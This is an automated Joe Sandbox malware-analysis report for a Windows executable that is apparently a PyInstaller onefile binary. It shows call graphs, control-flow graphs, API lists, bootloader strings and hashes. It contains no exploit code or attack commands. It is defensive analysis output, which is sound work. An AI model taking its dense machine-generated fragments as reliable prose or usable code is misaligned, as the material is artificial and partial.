__free_lconv_mon 11 API calls 19275->19270 19277 7ff70af0f910 _fread_nolock MultiByteToWideChar 19276->19277 19276->19286 19278 7ff70af179f6 19277->19278 19278->19286 19298 7ff70af0f154 19278->19298 19281 7ff70af17a41 19284 7ff70af0f154 __crtLCMapStringW 6 API calls 19281->19284 19281->19286 19282 7ff70af17a92 19283 7ff70af0d66c _fread_nolock 12 API calls 19282->19283 19285 7ff70af17b64 19282->19285 19288 7ff70af17ab0 19282->19288 19283->19288 19284->19286 19285->19286 19287 7ff70af0a9b8 __free_lconv_mon 11 API calls 19285->19287 19286->19270 19286->19275 19287->19286 19288->19286 19289 7ff70af0f154 __crtLCMapStringW 6 API calls 19288->19289 19290 7ff70af17b30 19289->19290 19290->19285 19291 7ff70af17b50 19290->19291 19292 7ff70af17b66 19290->19292 19293 7ff70af10858 WideCharToMultiByte 19291->19293 19294 7ff70af10858 WideCharToMultiByte 19292->19294 19295 7ff70af17b5e 19293->19295 19294->19295 19295->19285 19296 7ff70af17b7e 19295->19296 19296->19286 19297 7ff70af0a9b8 __free_lconv_mon 11 API calls 19296->19297 19297->19286 19299 7ff70af0ed80 __crtLCMapStringW 5 API calls 19298->19299 19300 7ff70af0f192 19299->19300 19301 7ff70af0f19a 19300->19301 19304 7ff70af0f240 19300->19304 19301->19281 19301->19282 19301->19286 19303 7ff70af0f203 LCMapStringW 19303->19301 19305 7ff70af0ed80 __crtLCMapStringW 5 API calls 19304->19305 19306 7ff70af0f26e __crtLCMapStringW 19305->19306 19306->19303 20450 7ff70af0c590 20461 7ff70af10348 EnterCriticalSection 20450->20461 18780 7ff70af05698 18781 7ff70af056b2 18780->18781 18782 7ff70af056cf 18780->18782 18783 7ff70af04f58 _fread_nolock 11 API calls 18781->18783 18782->18781 18784 7ff70af056e2 CreateFileW 18782->18784 18785 7ff70af056b7 18783->18785 18786 7ff70af05716 18784->18786 18787 7ff70af0574c 18784->18787 18789 7ff70af04f78 _get_daylight 11 API calls 18785->18789 18805 7ff70af057ec GetFileType 18786->18805 18831 7ff70af05c74 18787->18831 18792 7ff70af056bf 18789->18792 18796 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 18792->18796 18794 7ff70af05755 18799 7ff70af04eec _fread_nolock 11 API calls 18794->18799 18795 7ff70af05780 18852 7ff70af05a34 18795->18852 18800 7ff70af056ca 18796->18800 18797 7ff70af05741 CloseHandle 18797->18800 18798 7ff70af0572b CloseHandle 18798->18800 18804 7ff70af0575f 18799->18804 18804->18800 18806 7ff70af0583a 18805->18806 18807 7ff70af058f7 18805->18807 18808 7ff70af05866 GetFileInformationByHandle 18806->18808 18812 7ff70af05b70 21 API calls 18806->18812 18809 7ff70af05921 18807->18809 18810 7ff70af058ff 18807->18810 18813 7ff70af05912 GetLastError 18808->18813 18814 7ff70af0588f 18808->18814 18811 7ff70af05944 PeekNamedPipe 18809->18811 18830 7ff70af058e2 18809->18830 18810->18813 18815 7ff70af05903 18810->18815 18811->18830 18816 7ff70af05854 18812->18816 18819 7ff70af04eec _fread_nolock 11 API calls 18813->18819 18817 7ff70af05a34 51 API calls 18814->18817 18818 7ff70af04f78 _get_daylight 11 API calls 18815->18818 18816->18808 18816->18830 18821 7ff70af0589a 18817->18821 18818->18830 18819->18830 18820 7ff70aefc5c0 _log10_special 8 API calls 18822 7ff70af05724 18820->18822 18869 7ff70af05994 18821->18869 18822->18797 18822->18798 18825 7ff70af05994 10 API calls 18826 7ff70af058b9 18825->18826 18827 7ff70af05994 10 API calls 18826->18827 18828 7ff70af058ca 18827->18828 18829 7ff70af04f78 _get_daylight 11 API calls 18828->18829 18828->18830 18829->18830 18830->18820 18832 7ff70af05caa 18831->18832 18833 7ff70af05d42 __std_exception_destroy 18832->18833 18834 7ff70af04f78 _get_daylight 11 API calls 18832->18834 18835 7ff70aefc5c0 _log10_special 8 API calls 18833->18835 18836 7ff70af05cbc 18834->18836 18837 7ff70af05751 18835->18837 18838 7ff70af04f78 _get_daylight 11 API calls 18836->18838 18837->18794 18837->18795 18839 7ff70af05cc4 18838->18839 18840 7ff70af07e78 45 API calls 18839->18840 18841 7ff70af05cd9 18840->18841 18842 7ff70af05ce1 18841->18842 18843 7ff70af05ceb 18841->18843 18844 7ff70af04f78 _get_daylight 11 API calls 18842->18844 18845 7ff70af04f78 _get_daylight 11 API calls 18843->18845 18851 7ff70af05ce6 18844->18851 18846 7ff70af05cf0 18845->18846 18846->18833 18847 7ff70af04f78 _get_daylight 11 API calls 18846->18847 18848 7ff70af05cfa 18847->18848 18849 7ff70af07e78 45 API calls 18848->18849 18849->18851 18850 7ff70af05d34 GetDriveTypeW 18850->18833 18851->18833 18851->18850 18854 7ff70af05a5c 18852->18854 18853 7ff70af0578d 18862 7ff70af05b70 18853->18862 18854->18853 18876 7ff70af0f794 18854->18876 18856 7ff70af05af0 18856->18853 18857 7ff70af0f794 51 API calls 18856->18857 18858 7ff70af05b03 18857->18858 18858->18853 18859 7ff70af0f794 51 API calls 18858->18859 18860 7ff70af05b16 18859->18860 18860->18853 18861 7ff70af0f794 51 API calls 18860->18861 18861->18853 18863 7ff70af05b8a 18862->18863 18864 7ff70af05bc1 18863->18864 18865 7ff70af05b9a 18863->18865 18866 7ff70af0f628 21 API calls 18864->18866 18867 7ff70af04eec _fread_nolock 11 API calls 18865->18867 18868 7ff70af05baa 18865->18868 18866->18868 18867->18868 18868->18804 18870 7ff70af059b0 18869->18870 18871 7ff70af059bd FileTimeToSystemTime 18869->18871 18870->18871 18873 7ff70af059b8 18870->18873 18872 7ff70af059d1 SystemTimeToTzSpecificLocalTime 18871->18872 18871->18873 18872->18873 18874 7ff70aefc5c0 _log10_special 8 API calls 18873->18874 18875 7ff70af058a9 18874->18875 18875->18825 18877 7ff70af0f7c5 18876->18877 18878 7ff70af0f7a1 18876->18878 18881 7ff70af0f7ff 18877->18881 18882 7ff70af0f81e 18877->18882 18878->18877 18879 7ff70af0f7a6 18878->18879 18880 7ff70af04f78 _get_daylight 11 API calls 18879->18880 18883 7ff70af0f7ab 18880->18883 18884 7ff70af04f78 _get_daylight 11 API calls 18881->18884 18885 7ff70af04fbc 45 API calls 18882->18885 18886 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 18883->18886 18887 7ff70af0f804 18884->18887 18891 7ff70af0f82b 18885->18891 18888 7ff70af0f7b6 18886->18888 18889 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 18887->18889 18888->18856 18890 7ff70af0f80f 18889->18890 18890->18856 18891->18890 18892 7ff70af1054c 51 API calls 18891->18892 18892->18891

                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                      Function 00007FF70AEF8BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 0 7ff70aef8bd0-7ff70aef8d16 call 7ff70aefc8c0 call 7ff70aef9400 SetConsoleCtrlHandler GetStartupInfoW call 7ff70af05460 call 7ff70af0a4ec call 7ff70af0878c call 7ff70af05460 call 7ff70af0a4ec call 7ff70af0878c call 7ff70af05460 call 7ff70af0a4ec call 7ff70af0878c GetCommandLineW CreateProcessW 23 7ff70aef8d3d-7ff70aef8d79 RegisterClassW 0->23 24 7ff70aef8d18-7ff70aef8d38 GetLastError call 7ff70aef2c50 0->24 25 7ff70aef8d81-7ff70aef8dd5 CreateWindowExW 23->25 26 7ff70aef8d7b GetLastError 23->26 31 7ff70aef9029-7ff70aef904f call 7ff70aefc5c0 24->31 28 7ff70aef8ddf-7ff70aef8de4 ShowWindow 25->28 29 7ff70aef8dd7-7ff70aef8ddd GetLastError 25->29 26->25 32 7ff70aef8dea-7ff70aef8dfa WaitForSingleObject 28->32 29->32 34 7ff70aef8dfc 32->34 35 7ff70aef8e78-7ff70aef8e7f 32->35 37 7ff70aef8e00-7ff70aef8e03 34->37 38 7ff70aef8ec2-7ff70aef8ec9 35->38 39 7ff70aef8e81-7ff70aef8e91 WaitForSingleObject 35->39 42 7ff70aef8e05 GetLastError 37->42 43 7ff70aef8e0b-7ff70aef8e12 37->43 40 7ff70aef8fb0-7ff70aef8fc9 GetMessageW 38->40 41 7ff70aef8ecf-7ff70aef8ee5 QueryPerformanceFrequency QueryPerformanceCounter 38->41 44 7ff70aef8fe8-7ff70aef8ff2 39->44 45 7ff70aef8e97-7ff70aef8ea7 TerminateProcess 39->45 50 7ff70aef8fdf-7ff70aef8fe6 40->50 51 7ff70aef8fcb-7ff70aef8fd9 TranslateMessage DispatchMessageW 40->51 48 7ff70aef8ef0-7ff70aef8f28 MsgWaitForMultipleObjects PeekMessageW 41->48 42->43 43->39 49 7ff70aef8e14-7ff70aef8e31 PeekMessageW 43->49 52 7ff70aef8ff4-7ff70aef8ffa DestroyWindow 44->52 53 7ff70aef9001-7ff70aef9025 GetExitCodeProcess CloseHandle * 2 44->53 46 7ff70aef8eaf-7ff70aef8ebd WaitForSingleObject 45->46 47 7ff70aef8ea9 GetLastError 45->47 46->44 47->46 54 7ff70aef8f63-7ff70aef8f6a 48->54 55 7ff70aef8f2a 48->55 56 7ff70aef8e66-7ff70aef8e76 WaitForSingleObject 49->56 57 7ff70aef8e33-7ff70aef8e64 TranslateMessage DispatchMessageW PeekMessageW 49->57 50->40 50->44 51->50 52->53 53->31 54->40 59 7ff70aef8f6c-7ff70aef8f95 QueryPerformanceCounter 54->59 58 7ff70aef8f30-7ff70aef8f61 TranslateMessage DispatchMessageW PeekMessageW 55->58 56->35 56->37 57->56 57->57 58->54 58->58 59->48 60 7ff70aef8f9b-7ff70aef8fa2 59->60 60->44 61 7ff70aef8fa4-7ff70aef8fa8 60->61 61->40
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                      • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                      • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                      • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                      • Instruction ID: 1fc06cf030bcc3955ffb3441f5565ea066e3bc27c2c8ad2734c333fd71ae113e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 07D17D33A08A8686FB10AF74EC552A9B764FF84B58FC04275DA5D52BA8DF3CE544C710
                                                                                                                                                                                                                                      Function 00007FF70AEF1000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 62 7ff70aef1000-7ff70aef3806 call 7ff70aeffe88 call 7ff70aeffe90 call 7ff70aefc8c0 call 7ff70af05460 call 7ff70af054f4 call 7ff70aef36b0 76 7ff70aef3814-7ff70aef3836 call 7ff70aef1950 62->76 77 7ff70aef3808-7ff70aef380f 62->77 83 7ff70aef391b-7ff70aef3931 call 7ff70aef45b0 76->83 84 7ff70aef383c-7ff70aef3856 call 7ff70aef1c80 76->84 78 7ff70aef3c97-7ff70aef3cb2 call 7ff70aefc5c0 77->78 89 7ff70aef3933-7ff70aef3960 call 7ff70aef7f80 83->89 90 7ff70aef396a-7ff70aef397f call 7ff70aef2710 83->90 88 7ff70aef385b-7ff70aef389b call 7ff70aef8a20 84->88 97 7ff70aef38c1-7ff70aef38cc call 7ff70af04fa0 88->97 98 7ff70aef389d-7ff70aef38a3 88->98 100 7ff70aef3984-7ff70aef39a6 call 7ff70aef1c80 89->100 101 7ff70aef3962-7ff70aef3965 call 7ff70af000bc 89->101 102 7ff70aef3c8f 90->102 110 7ff70aef38d2-7ff70aef38e1 call 7ff70aef8a20 97->110 111 7ff70aef39fc-7ff70aef3a2a call 7ff70aef8b30 call 7ff70aef8b90 * 3 97->111 103 7ff70aef38a5-7ff70aef38ad 98->103 104 7ff70aef38af-7ff70aef38bd call 7ff70aef8b90 98->104 115 7ff70aef39b0-7ff70aef39b9 100->115 101->90 102->78 103->104 104->97 119 7ff70aef39f4-7ff70aef39f7 call 7ff70af04fa0 110->119 120 7ff70aef38e7-7ff70aef38ed 110->120 138 7ff70aef3a2f-7ff70aef3a3e call 7ff70aef8a20 111->138 115->115 118 7ff70aef39bb-7ff70aef39d8 call 7ff70aef1950 115->118 118->88 127 7ff70aef39de-7ff70aef39ef call 7ff70aef2710 118->127 119->111 124 7ff70aef38f0-7ff70aef38fc 120->124 128 7ff70aef3905-7ff70aef3908 124->128 129 7ff70aef38fe-7ff70aef3903 124->129 127->102 128->119 132 7ff70aef390e-7ff70aef3916 call 7ff70af04fa0 128->132 129->124 129->128 132->138 141 7ff70aef3b45-7ff70aef3b53 138->141 142 7ff70aef3a44-7ff70aef3a47 138->142 144 7ff70aef3b59-7ff70aef3b5d 141->144 145 7ff70aef3a67 141->145 142->141 143 7ff70aef3a4d-7ff70aef3a50 142->143 146 7ff70aef3a56-7ff70aef3a5a 143->146 147 7ff70aef3b14-7ff70aef3b17 143->147 148 7ff70aef3a6b-7ff70aef3a90 call 7ff70af04fa0 144->148 145->148 146->147 149 7ff70aef3a60 146->149 150 7ff70aef3b2f-7ff70aef3b40 call 7ff70aef2710 147->150 151 7ff70aef3b19-7ff70aef3b1d 147->151 157 7ff70aef3a92-7ff70aef3aa6 call 7ff70aef8b30 148->157 158 7ff70aef3aab-7ff70aef3ac0 148->158 149->145 159 7ff70aef3c7f-7ff70aef3c87 150->159 151->150 153 7ff70aef3b1f-7ff70aef3b2a 151->153 153->148 157->158 161 7ff70aef3ac6-7ff70aef3aca 158->161 162 7ff70aef3be8-7ff70aef3bfa call 7ff70aef8a20 158->162 159->102 164 7ff70aef3ad0-7ff70aef3ae8 call 7ff70af052c0 161->164 165 7ff70aef3bcd-7ff70aef3be2 call 7ff70aef1940 161->165 170 7ff70aef3c2e 162->170 171 7ff70aef3bfc-7ff70aef3c02 162->171 176 7ff70aef3b62-7ff70aef3b7a call 7ff70af052c0 164->176 177 7ff70aef3aea-7ff70aef3b02 call 7ff70af052c0 164->177 165->161 165->162 173 7ff70aef3c31-7ff70aef3c40 call 7ff70af04fa0 170->173 174 7ff70aef3c04-7ff70aef3c1c 171->174 175 7ff70aef3c1e-7ff70aef3c2c 171->175 185 7ff70aef3c46-7ff70aef3c4a 173->185 186 7ff70aef3d41-7ff70aef3d63 call 7ff70aef44d0 173->186 174->173 175->173 187 7ff70aef3b7c-7ff70aef3b80 176->187 188 7ff70aef3b87-7ff70aef3b9f call 7ff70af052c0 176->188 177->165 184 7ff70aef3b08-7ff70aef3b0f 177->184 184->165 190 7ff70aef3cd4-7ff70aef3ce6 call 7ff70aef8a20 185->190 191 7ff70aef3c50-7ff70aef3c5f call 7ff70aef90e0 185->191 201 7ff70aef3d65-7ff70aef3d6f call 7ff70aef4620 186->201 202 7ff70aef3d71-7ff70aef3d82 call 7ff70aef1c80 186->202 187->188 197 7ff70aef3ba1-7ff70aef3ba5 188->197 198 7ff70aef3bac-7ff70aef3bc4 call 7ff70af052c0 188->198 206 7ff70aef3d35-7ff70aef3d3c 190->206 207 7ff70aef3ce8-7ff70aef3ceb 190->207 204 7ff70aef3cb3-7ff70aef3cb6 call 7ff70aef8850 191->204 205 7ff70aef3c61 191->205 197->198 198->165 217 7ff70aef3bc6 198->217 215 7ff70aef3d87-7ff70aef3d96 201->215 202->215 216 7ff70aef3cbb-7ff70aef3cbd 204->216 212 7ff70aef3c68 call 7ff70aef2710 205->212 206->212 207->206 213 7ff70aef3ced-7ff70aef3d10 call 7ff70aef1c80 207->213 226 7ff70aef3c6d-7ff70aef3c77 212->226 230 7ff70aef3d12-7ff70aef3d26 call 7ff70aef2710 call 7ff70af04fa0 213->230 231 7ff70aef3d2b-7ff70aef3d33 call 7ff70af04fa0 213->231 220 7ff70aef3dc4-7ff70aef3dda call 7ff70aef9400 215->220 221 7ff70aef3d98-7ff70aef3d9f 215->221 224 7ff70aef3cbf-7ff70aef3cc6 216->224 225 7ff70aef3cc8-7ff70aef3ccf 216->225 217->165 233 7ff70aef3ddc 220->233 234 7ff70aef3de8-7ff70aef3e04 SetDllDirectoryW 220->234 221->220 222 7ff70aef3da1-7ff70aef3da5 221->222 222->220 228 7ff70aef3da7-7ff70aef3dbe SetDllDirectoryW LoadLibraryExW 222->228 224->212 225->215 226->159 228->220 230->226 231->215 233->234 237 7ff70aef3f01-7ff70aef3f08 234->237 238 7ff70aef3e0a-7ff70aef3e19 call 7ff70aef8a20 234->238 241 7ff70aef3f0e-7ff70aef3f15 237->241 242 7ff70aef3ffc-7ff70aef4004 237->242 251 7ff70aef3e32-7ff70aef3e3c call 7ff70af04fa0 238->251 252 7ff70aef3e1b-7ff70aef3e21 238->252 241->242 245 7ff70aef3f1b-7ff70aef3f25 call 7ff70aef33c0 241->245 246 7ff70aef4006-7ff70aef4023 PostMessageW GetMessageW 242->246 247 7ff70aef4029-7ff70aef405b call 7ff70aef36a0 call 7ff70aef3360 call 7ff70aef3670 call 7ff70aef6fb0 call 7ff70aef6d60 242->247 245->226 259 7ff70aef3f2b-7ff70aef3f3f call 7ff70aef90c0 245->259 246->247 261 7ff70aef3ef2-7ff70aef3efc call 7ff70aef8b30 251->261 262 7ff70aef3e42-7ff70aef3e48 251->262 255 7ff70aef3e23-7ff70aef3e2b 252->255 256 7ff70aef3e2d-7ff70aef3e2f 252->256 255->256 256->251 271 7ff70aef3f64-7ff70aef3fa0 call 7ff70aef8b30 call 7ff70aef8bd0 call 7ff70aef6fb0 call 7ff70aef6d60 call 7ff70aef8ad0 259->271 272 7ff70aef3f41-7ff70aef3f5e PostMessageW GetMessageW 259->272 261->237 262->261 266 7ff70aef3e4e-7ff70aef3e54 262->266 269 7ff70aef3e56-7ff70aef3e58 266->269 270 7ff70aef3e5f-7ff70aef3e61 266->270 274 7ff70aef3e5a 269->274 275 7ff70aef3e67-7ff70aef3e83 call 7ff70aef6db0 call 7ff70aef7330 269->275 270->237 270->275 307 7ff70aef3fa5-7ff70aef3fa7 271->307 272->271 274->237 290 7ff70aef3e85-7ff70aef3e8c 275->290 291 7ff70aef3e8e-7ff70aef3e95 275->291 293 7ff70aef3edb-7ff70aef3ef0 call 7ff70aef2a50 call 7ff70aef6fb0 call 7ff70aef6d60 290->293 294 7ff70aef3eaf-7ff70aef3eb9 call 7ff70aef71a0 291->294 295 7ff70aef3e97-7ff70aef3ea4 call 7ff70aef6df0 291->295 293->237 305 7ff70aef3ec4-7ff70aef3ed2 call 7ff70aef74e0 294->305 306 7ff70aef3ebb-7ff70aef3ec2 294->306 295->294 304 7ff70aef3ea6-7ff70aef3ead 295->304 304->293 305->237 318 7ff70aef3ed4 305->318 306->293 310 7ff70aef3fe9-7ff70aef3ff7 call 7ff70aef1900 307->310 311 7ff70aef3fa9-7ff70aef3fb3 call 7ff70aef9200 307->311 310->226 311->310 321 7ff70aef3fb5-7ff70aef3fca 311->321 318->293 322 7ff70aef3fe4 call 7ff70aef2a50 321->322 323 7ff70aef3fcc-7ff70aef3fdf call 7ff70aef2710 call 7ff70aef1900 321->323 322->310 323->226
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                      • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                      • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                      • Opcode ID: 44b6149e1a44f815cbaf6e2375de99b2dfa5e961a20aa3e5c6a8e77e9d9f5974
                                                                                                                                                                                                                                      • Instruction ID: 512d295fc8a0aedf45d839b72d19af62bea828e99f73b50e2f05f35f50c8a1ff
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44b6149e1a44f815cbaf6e2375de99b2dfa5e961a20aa3e5c6a8e77e9d9f5974
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C324B23A0868391FA25FB25DC562B9E691EF44780FC440B2DA6D472D6EF2CF555D320
                                                                                                                                                                                                                                      Function 00007FF70AF169D4 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 536 7ff70af169d4-7ff70af16a47 call 7ff70af16708 539 7ff70af16a49-7ff70af16a52 call 7ff70af04f58 536->539 540 7ff70af16a61-7ff70af16a6b call 7ff70af08590 536->540 547 7ff70af16a55-7ff70af16a5c call 7ff70af04f78 539->547 545 7ff70af16a6d-7ff70af16a84 call 7ff70af04f58 call 7ff70af04f78 540->545 546 7ff70af16a86-7ff70af16aef CreateFileW 540->546 545->547 549 7ff70af16b6c-7ff70af16b77 GetFileType 546->549 550 7ff70af16af1-7ff70af16af7 546->550 563 7ff70af16da2-7ff70af16dc2 547->563 556 7ff70af16b79-7ff70af16bb4 GetLastError call 7ff70af04eec CloseHandle 549->556 557 7ff70af16bca-7ff70af16bd1 549->557 553 7ff70af16b39-7ff70af16b67 GetLastError call 7ff70af04eec 550->553 554 7ff70af16af9-7ff70af16afd 550->554 553->547 554->553 561 7ff70af16aff-7ff70af16b37 CreateFileW 554->561 556->547 570 7ff70af16bba-7ff70af16bc5 call 7ff70af04f78 556->570 559 7ff70af16bd9-7ff70af16bdc 557->559 560 7ff70af16bd3-7ff70af16bd7 557->560 566 7ff70af16be2-7ff70af16c37 call 7ff70af084a8 559->566 567 7ff70af16bde 559->567 560->566 561->549 561->553 575 7ff70af16c39-7ff70af16c45 call 7ff70af16910 566->575 576 7ff70af16c56-7ff70af16c87 call 7ff70af16488 566->576 567->566 570->547 575->576 583 7ff70af16c47 575->583 581 7ff70af16c89-7ff70af16c8b 576->581 582 7ff70af16c8d-7ff70af16ccf 576->582 584 7ff70af16c49-7ff70af16c51 call 7ff70af0ab30 581->584 585 7ff70af16cf1-7ff70af16cfc 582->585 586 7ff70af16cd1-7ff70af16cd5 582->586 583->584 584->563 588 7ff70af16da0 585->588 589 7ff70af16d02-7ff70af16d06 585->589 586->585 587 7ff70af16cd7-7ff70af16cec 586->587 587->585 588->563 589->588 592 7ff70af16d0c-7ff70af16d51 CloseHandle CreateFileW 589->592 593 7ff70af16d53-7ff70af16d81 GetLastError call 7ff70af04eec call 7ff70af086d0 592->593 594 7ff70af16d86-7ff70af16d9b 592->594 593->594 594->588
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1617910340-0
                                                                                                                                                                                                                                      • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                      • Instruction ID: fee2240f18cc0681cbe84178b752af54e8ac407ae10f2cc67f00e149f3bc37ce
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5C1BD37B28A4186FB50EFA5C8906AC7761EB49BA8F814275DF2E97794CF38E011C310
                                                                                                                                                                                                                                      Function 00007FF70AEF83B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,00007FF70AEF8B09,00007FF70AEF3FA5), ref: 00007FF70AEF841B
                                                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF70AEF8B09,00007FF70AEF3FA5), ref: 00007FF70AEF849E
                                                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(?,00007FF70AEF8B09,00007FF70AEF3FA5), ref: 00007FF70AEF84BD
                                                                                                                                                                                                                                      • FindNextFileW.KERNELBASE(?,00007FF70AEF8B09,00007FF70AEF3FA5), ref: 00007FF70AEF84CB
                                                                                                                                                                                                                                      • FindClose.KERNEL32(?,00007FF70AEF8B09,00007FF70AEF3FA5), ref: 00007FF70AEF84DC
                                                                                                                                                                                                                                      • RemoveDirectoryW.KERNELBASE(?,00007FF70AEF8B09,00007FF70AEF3FA5), ref: 00007FF70AEF84E5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
